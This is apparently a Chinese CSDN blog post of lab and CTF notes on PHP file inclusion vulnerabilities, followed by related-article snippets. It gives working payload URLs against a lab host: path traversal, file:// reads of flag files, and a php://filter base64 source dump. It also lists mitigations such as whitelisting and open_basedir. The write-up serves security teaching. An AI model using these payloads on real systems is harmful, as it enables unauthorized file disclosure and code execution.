网络攻防--文件包含

于 2024-04-24 16:01:13 发布
阅读量187 收藏 3
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52466982/article/details/138161623
版权

练习1:192.168.2.101/include.php
1、读出服务器c:\flag.txt(用两种方法)
方法一:
http://192.168.2.101/include/include.php?c=file:///c:\flag.txt
方法二:
http://192.168.2.101/include/include.php?c=c:\flag.txt
2、已知flag.txt存放在当前目录的上四层目录下的名为1的文件夹下
http://192.168.2.101/include/include.php?c=…/…/…/…/1/flag.txt
3、将当前目录下的test.txt文件以php方式运行
http://192.168.2.101/include/include.php?c=test.txt
4、将同一目录下的include.php内容读出来
http://192.168.2.101/include/include.php?c=php://filter/read=convert.base64-encode/resource=include.php
对得到的加密字符串进行base64解密,得到include.php文件内容。
在这里插入图片描述

5、文件包含漏洞如何避免
1、尽可能避免使用动态文件包含,采用静态文件包含。
2、验证用户输入的参数是否是有效的文件名,且只能包含允许包含的文件。
3、定义一个文件名的白名单,应用程序只能包括这些文件中的内容。
4、尽可能避免在文件包含语句中使用可变变量,这将使攻击者更难利用包含路径。
5、将所需要包含的文件存储在一个特定目录下,并限制只能从该目录下包含文件。
6、启用 PHP 的 open_basedir 选项,能定义了 PHP 脚本能够读取和写入文件的目录,我们可以通过设定该选项,限制动态文件包含的范畴。
7、及时更新语言解释器或使用的框架,以保证安全漏洞得到修复。

练习2:192.168.2.101/bh
登陆发现192.168.2.101/bh的主页为index.php,访问该主页
随机提交一个并抓包
修改file
在这里插入图片描述
在这里插入图片描述

发现base64码解码
在这里插入图片描述

找到flag:{Jus7_a_simpl3_fil3_includ3}

梦醒ღ
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
网络攻防之-针对ms17-010脚本(python)
12-23
网络攻防之—针对ms17-010脚本(python) 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局...
网络攻防入门---文件包含漏洞
濯君
12-27 283
有些网页具有包含其他页面到当前页面的功能,是通过URL设置参数添加进来的,比如下面这个URL http://192.168.232.128/dvwa/vulnerabilities/fi/?page=include.php 将include.php包含进来 一:low级别 <?php $file = $_GET['page']; //The page we wish to display ?> 因为源码中没有对页面进行检查,直接包含,所以可以随意引入其他页面 比如引入c.p
网络渗透测试安全攻防-Cuppa CMS 文件包含漏洞
网络安全领域优质创作者
11-05 1672
目录扫描,拿到登陆地址 http://10.11.1.116/db/phpliteadmin.php admin phpliteadmin1.9.3PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit CuppaCMS文件包含漏洞 http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../.....
网络攻防--网络防御技术
weixin_68789096的博客
03-22 2220
(3)电路级网关:用来监控受信任的客户或服务器与不受信任的主机间的TCP握手信息,这样来决定该会话(Session)是否合法,电路级网关是在OSI模型中会话层来过滤数据包,这样比包过滤防火墙要高二层。包过滤技术和应用网关是通过特定的逻辑判断来决定是否允许特定的数据包通过,一旦判断条件满足,防火墙内部网络的结构和运行状态便暴露在外来用户面前,这就引入了代理服务的概念。安全审计:系统可以自动根据用户的访问权限,对计算机网络环境下的有关活动或行为进行系统的、独立的检查验证,并做出相应的评价与审计。
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 15万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
攻防世界-题目名称-文件包含
qq_45955869的博客
06-07 212
攻防世界-题目名称-文件包含常见文件包含漏洞。php:filter//过滤。
网络攻防-基础-1-安装虚拟机和系统
m0_67362399的博客
02-28 1156
1. 首先安装虚拟机 本人win10系统,默认安装即可,安装完成之后打开网络,如果看到两个虚拟网络,就表示安装完成。 2. 安装系统 打开虚拟机 点击【文件】-【新建虚拟机】,弹出【新建虚拟机向导】。选择【自定义安装】,【稍后安装操作系统】,客户机操作系统选择【Microsoft windows (W)】,版本号选择windows servers 2003 enterpress edtion(是2003专业版32位的),默认,默认,然后此虚拟机的内存填写2048,之后是网络连接,网络连接选择【使
网络攻防--溯源与取证分析实验
qq_64389397的博客
01-07 1214
splfileobject是PHP5中新加入的一个文件访问类,它继承于php标准库(SPL)中的Iterator和SeekableIterator接口,并提供了对文件的高效访问和处理。通过导出http对象,查看http的流量交互对象,可以看到在后面的分组中,主要是与1.php进行流量交互,可以确定1.php就是攻击者上传的shell文件。在日志文件中查找tmp,发现一串URL编码的数据,进行解密,发现黑客通过filename参数向/tmp目录传递了一个sess_car文件。然后就可以查看https协议了。
网络安全网络安全攻防 -- 网络攻击简要流程
m0_60571990的博客
10-25 889
网络安全网络安全攻防 -- 黑客攻击简要流程
攻防世界-web-wzsc_文件上传
mlws1900的博客
08-24 3459
1、网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除该文件。2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。在删除之前访问上传的php文件,从而执行上传文件中的php代码。服务器获取文件>>>保存上传临时文件>>>重命名移动临时文件。可以看到shell已经被上传,用蚁剑连接。上传一个空内容的jpg文件,上传成功。打开环境,很简单的上传界面。1. 文件上传过程介绍。例如:上传文件代码如下。此为需要上传的文件内容。利用条件竞争文件上传。
【攻防世界】题目名称-文件包含
wangzhemvp的博客
04-09 608
一直显示 do not hack!,可能是 include("./check.php") 过滤了。依次尝试如下payload,还是提示 do not hack。看到 include(),想到文件包含,用php伪协议。convert.iconv. 要一个一个的破解。(1)php://filter 其他编码方式。convert.iconv.[ ]过滤器。,想到文件包含,用php伪协议。找到输出编码,再找输入编码。
广东大学生网络安全攻防大赛(题目附件-剩下的)
05-25
文件包含了比赛上本人没做出来的题目的附件
网络安全攻防演习防守手册.pdf
06-09
三、建立网络安全防护能力 1、常见的网络拓扑 任何一家参与网络攻防演习防守单位, 网络拓扑、 业务 应用各不相同,为了便于理解,我们从多家单位的网络拓 扑中抽出共性特征,做出如图 2-1 的网络拓扑。 图 3-1:...
信息安全,攻防培训比赛
11-08
网络安全攻防
太原理工大学网络攻击与防御实验指导书-2022年写
03-03
实验一 MS08_067 漏洞验证与利用 实验二 SQL 注入靶场练习 实验三 文件上传漏洞的利用 实验四 文件包含漏洞的利用与防护
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8220
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
软考-考生常见操作说明-202405101400-纯图版.pdf
05-14
软考官网--2024常见操作说明:包括如何绘制网络图、UML图、表格等 模拟作答系统是计算机技术与软件专业技术资格(水平)考试的电子化考试系统界面、作答过程的仿真系统,为各级别、各资格涉及输入和页面显示的部分题型提供体验性练习。
setuptools-34.0.3.zip
最新发布
05-14
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于遗传优化GA的三目标优化仿真【包括程序,注释,操作步骤】
05-14
1.版本:matlab2022A。 2.包含:程序,中文注释,仿真操作步骤(使用windows media player播放)。 3.领域:遗传优化 4.仿真效果:仿真效果可以参考博客同名文章《基于遗传优化GA的三目标优化仿真》 5.内容:基于遗传优化GA的三目标优化仿真。遗传算法(Genetic Algorithm, GA)是一种模拟自然选择和遗传机制的全局搜索优化方法,广泛应用于解决复杂优化问题,包括具有多个目标的优化问题,即多目标遗传算法(Multi-Objective Genetic Algorithm, MOGA)。在这里,将三个目标函数进行统一的编码,通过单目标遗传优化的方式,同步求解三个目标函数的最优值。 6.注意事项:注意MATLAB左侧当前文件夹路径,必须是程序所在文件夹位置,具体可以参考视频录。
网络攻防中子域名收集工具的设计与实现
03-26
2. 查找子域名:程序使用多种方式自动或半自动地查找与目标站点相关的子域名,包括基于字典的暴力枚举、搜索引擎的关键词匹配、社交媒体和在线论坛的信息采集等。 3. 过滤和去重:由于某些收集方式可能会产生大量...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值